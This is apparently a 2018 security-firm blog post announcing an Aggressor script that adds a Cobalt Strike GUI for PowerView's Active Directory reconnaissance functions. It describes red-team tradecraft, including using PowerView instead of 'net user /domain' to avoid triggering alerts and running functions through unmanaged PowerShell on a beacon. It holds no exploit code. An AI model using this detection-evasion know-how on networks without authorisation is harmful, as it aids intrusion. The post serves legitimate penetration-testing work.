March 22, 2018

Aggressor PowerView

Tevora employs a lot of different tools depending on what our need is. During penetration tests and red teams one of the most common that is used is PowerView from PowerSploit. PowerView is an excellent tool in performing reconnaissance in Windows environments and provides a wealth of value. The functions inside of it provide an alternative to native Windows commands that may get flagged by various detection tools making it a great alternative. An example of this would be rather than executing net user admin /domain (which would most likely trigger alerts) you could do Get-NetUser -UserName admin which would use Active Directory Service Interface and Lightweight Directory Access Protocol. This is a very simple example of what can be done with PowerView but it highlights some of its usability. In addition to some functionality that can be performed with native Windows commands there are a handful of custom functions in it as well that are extremely useful.

Another tool that is commonly used by Tevora’s threat team is Cobalt Strike. Cobalt Strike offers a lot of great features in it as well and is a common go to tool for red teams. One of the great features of Cobalt Strike is the scripting language called Aggressor that is built into Cobalt Strike which allows people to extend functionality for their needs.

One of the things that Tevora has done is created an Aggressor script which created an interface for using PowerView within it. Tevora has released this Aggressor script putting it on GitHub which can be found here. This Aggressor script allows for end users to get a GUI interface for all of the functions built into PowerView.

pv1

This is broken up the same way harmj0y broke it up on the PowerView README page.

pv2

While interacting with a Cobalt Strike beacon a user can right right click and see all the PowerView options available. With the amount of functions that are built into PowerView it is easy to forget what is available to you which a lot of times prompts users to open up the .ps1 file and read through the code/options. One of the things that is good about this is the ability to see right away everything available and to read a quick synopsis of the function.

The boxes within the interface indicate data that will be used for the PowerView functions while check boxes indicate switches in the functions. Additionally, users can select whether they use PowerPick (Unmanaged PowerShell) or PowerShell to execute their PowerView functions which gives a little more customization to what the end user wants to do.

There are a lot of different ways that PowerView can be used in PowerShell commands with execution of multiple functions at once to get specific data. Unfortunately in its current state this script does not offer the ability to do those things but simply offer the end user an interface to user PowerView and an easy way of remembering all functions and arguments for said functions. One of the things to note is this script does not automatically perform a powershell-import on PowerView.ps1 within Cobalt Strike so when using it users should always make sure it has been imported beforehand or are interacting with a beacon where it is imported.